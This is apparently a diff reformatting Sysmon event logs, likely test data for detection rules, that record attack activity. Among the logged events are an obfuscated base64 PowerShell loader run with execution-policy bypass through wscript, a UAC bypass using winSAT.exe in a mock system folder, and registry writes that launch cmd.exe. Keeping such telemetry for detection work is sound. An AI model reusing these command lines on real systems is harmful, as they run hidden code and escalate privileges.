([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))\"\"\"" Company: Microsoft Corporation @@ -1137,30 +1019,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 10675 - Execution: - "#attributes": - ProcessID: 2004 - ThreadID: 4480 + Execution_attributes: + ProcessID: 2004 + ThreadID: 4480 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-08-14T12:17:14.893930Z" + TimeCreated_attributes: + SystemTime: "2019-08-14T12:17:14.893930Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))\"\"\"" Company: Microsoft Corporation @@ -1189,30 +1067,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 10662 - Execution: - "#attributes": - ProcessID: 2004 - ThreadID: 4480 + Execution_attributes: + ProcessID: 2004 + ThreadID: 4480 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-08-14T11:53:30.022856Z" + TimeCreated_attributes: + SystemTime: "2019-08-14T11:53:30.022856Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-08-03 11:23:15.519" Image: "C:\\Windows\\explorer.exe" @@ -1227,30 +1101,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 5401 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T11:23:15.560614Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T11:23:15.560614Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Company: Yokai Ltd. Description: Yamabiko Proxy @@ -1272,30 +1142,26 @@ Event: Correlation: ~ EventID: 7 EventRecordID: 17728 - Execution: - "#attributes": - ProcessID: 2024 - ThreadID: 2004 + Execution_attributes: + ProcessID: 2024 + ThreadID: 2004 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 7 - TimeCreated: - "#attributes": - SystemTime: "2019-05-14T02:32:51.831307Z" + TimeCreated_attributes: + SystemTime: "2019-05-14T02:32:51.831307Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Company: "?" Description: "?" @@ -1317,30 +1183,26 @@ Event: Correlation: ~ EventID: 7 EventRecordID: 15975 - Execution: - "#attributes": - ProcessID: 2008 - ThreadID: 1992 + Execution_attributes: + ProcessID: 2008 + ThreadID: 1992 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 7 - TimeCreated: - "#attributes": - SystemTime: "2019-05-11T16:46:26.203657Z" + TimeCreated_attributes: + SystemTime: "2019-05-11T16:46:26.203657Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: (Empty) EventType: SetValue @@ -1356,30 +1218,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5944 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T10:16:31.476803Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T10:16:31.476803Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe" EventType: SetValue @@ -1395,30 +1253,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5946 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T10:16:31.609571Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T10:16:31.609571Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe" EventType: SetValue @@ -1434,30 +1288,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5953 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T10:16:55.441262Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T10:16:55.441262Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}" EventType: SetValue @@ -1473,30 +1323,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 5955 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2019-08-04T10:16:55.643799Z" + TimeCreated_attributes: + SystemTime: "2019-08-04T10:16:55.643799Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" " Company: "?" @@ -1525,30 +1371,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 4723 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:41.424255Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:41.424255Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-07-27 22:43:41.627" Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" @@ -1563,30 +1405,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 4724 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:41.755254Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:41.755254Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-07-27 22:43:41.627" Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" @@ -1601,30 +1439,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 4725 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:41.755406Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:41.755406Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-07-27 22:43:41.641" Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" @@ -1639,30 +1473,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 4726 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:41.757216Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:41.757216Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"C:\\Windows \\System32\\winSAT.exe\" formal" Company: Microsoft Corporation @@ -1691,30 +1521,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 4727 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:42.033042Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:42.033042Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CallTrace: "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+47241|C:\\Windows\\System32\\KERNELBASE.dll+46196|C:\\Windows\\System32\\KERNEL32.DLL+1c2e3|C:\\Windows\\System32\\windows.storage.dll+19f330|C:\\Windows\\System32\\windows.storage.dll+14ce7e|C:\\Windows\\System32\\windows.storage.dll+efad8|C:\\Windows\\System32\\windows.storage.dll+ef8b7|C:\\Windows\\System32\\windows.storage.dll+ef51d|C:\\Windows\\System32\\windows.storage.dll+14b0ad|C:\\Windows\\System32\\windows.storage.dll+145da4|C:\\Windows\\System32\\windows.storage.dll+147c7a|C:\\Windows\\System32\\windows.storage.dll+14432d|C:\\Windows\\System32\\windows.storage.dll+144225|C:\\Windows\\System32\\SHELL32.dll+a880f|C:\\Windows\\System32\\SHELL32.dll+a86ca|C:\\Windows\\System32\\SHELL32.dll+484e7|C:\\Windows\\System32\\SHELL32.dll+52549|C:\\Windows\\System32\\SHELL32.dll+a8393|C:\\Windows\\System32\\SHELL32.dll+a826b|C:\\Windows\\System32\\SHELL32.dll+50666|C:\\Windows\\System32\\SHELL32.dll+c2e1e|C:\\Windows\\System32\\shcore.dll+2c315|C:\\Windows\\System32\\KERNEL32.DLL+17974" GrantedAccess: "0x1fffff" @@ -1733,30 +1559,26 @@ Event: Correlation: ~ EventID: 10 EventRecordID: 4728 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 10 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:42.033420Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:42.033420Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CommandLine: "\"C:\\Windows \\System32\\winSAT.exe\" formal" Company: Microsoft Corporation @@ -1785,30 +1607,26 @@ Event: Correlation: ~ EventID: 1 EventRecordID: 4730 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 1 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:42.392880Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:42.392880Z" Version: 5 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 @@ -1821,30 +1639,26 @@ Event: Correlation: ~ EventID: 5 EventRecordID: 4731 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3376 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3376 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 5 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:42.938088Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:42.938088Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Company: "?" Description: "?" @@ -1866,30 +1680,26 @@ Event: Correlation: ~ EventID: 7 EventRecordID: 4732 - Execution: - "#attributes": - ProcessID: 2748 - ThreadID: 3384 + Execution_attributes: + ProcessID: 2748 + ThreadID: 3384 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 7 - TimeCreated: - "#attributes": - SystemTime: "2019-07-27T22:43:43.016956Z" + TimeCreated_attributes: + SystemTime: "2019-07-27T22:43:43.016956Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "c:\\Windows\\System32\\cmd.exe" EventType: SetValue @@ -1905,30 +1715,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 112814 - Execution: - "#attributes": - ProcessID: 2888 - ThreadID: 3384 + Execution_attributes: + ProcessID: 2888 + ThreadID: 3384 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-05-07T13:13:01.683498Z" + TimeCreated_attributes: + SystemTime: "2020-05-07T13:13:01.683498Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Company: "?" Description: "?" @@ -1950,30 +1756,26 @@ Event: Correlation: ~ EventID: 7 EventRecordID: 15882 - Execution: - "#attributes": - ProcessID: 2000 - ThreadID: 1748 + Execution_attributes: + ProcessID: 2000 + ThreadID: 1748 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 7 - TimeCreated: - "#attributes": - SystemTime: "2019-05-11T09:50:27.030880Z" + TimeCreated_attributes: + SystemTime: "2019-05-11T09:50:27.030880Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Details: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK" EventType: SetValue @@ -1989,30 +1791,26 @@ Event: Correlation: ~ EventID: 13 EventRecordID: 143174 - Execution: - "#attributes": - ProcessID: 2856 - ThreadID: 3608 + Execution_attributes: + ProcessID: 2856 + ThreadID: 3608 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 13 - TimeCreated: - "#attributes": - SystemTime: "2020-05-12T15:06:49.183867Z" + TimeCreated_attributes: + SystemTime: "2020-05-12T15:06:49.183867Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: Company: "?" Description: "?" @@ -2034,30 +1832,26 @@ Event: Correlation: ~ EventID: 7 EventRecordID: 15992 - Execution: - "#attributes": - ProcessID: 2008 - ThreadID: 1992 + Execution_attributes: + ProcessID: 2008 + ThreadID: 1992 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 7 - TimeCreated: - "#attributes": - SystemTime: "2019-05-11T16:54:18.069438Z" + TimeCreated_attributes: + SystemTime: "2019-05-11T16:54:18.069438Z" Version: 3 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-08-03 12:06:53.846" Image: "C:\\Windows\\explorer.exe" @@ -2072,30 +1866,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 5429 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T12:06:53.933988Z" + TimeCreated_attributes: + SystemTime: "2019-08-03T12:06:53.933988Z" Version: 2 +Event_attributes: + xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" --- Event: - "#attributes": - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" EventData: CreationUtcTime: "2019-08-03 12:08:13.721" Image: "C:\\Windows\\explorer.exe" @@ -2110,30 +1900,26 @@ Event: Correlation: ~ EventID: 11 EventRecordID: 5438 - Execution: - "#attributes": - ProcessID: 2780 - ThreadID: 3676 + Execution_attributes: + ProcessID: 2780 + ThreadID: 3676 Keywords: "0x8000000000000000" Level: 4 Opcode: 0 - Provider: - "#attributes": - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security: - "#attributes": - UserID: S-1-5-18 + Provider_attributes: + Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 + Name: Microsoft-Windows-Sysmon + Security_attributes: + UserID: S-1-5-18 Task: 11 - TimeCreated: - "#attributes": - SystemTime: "2019-08-03T12:08:13.818381Z" + 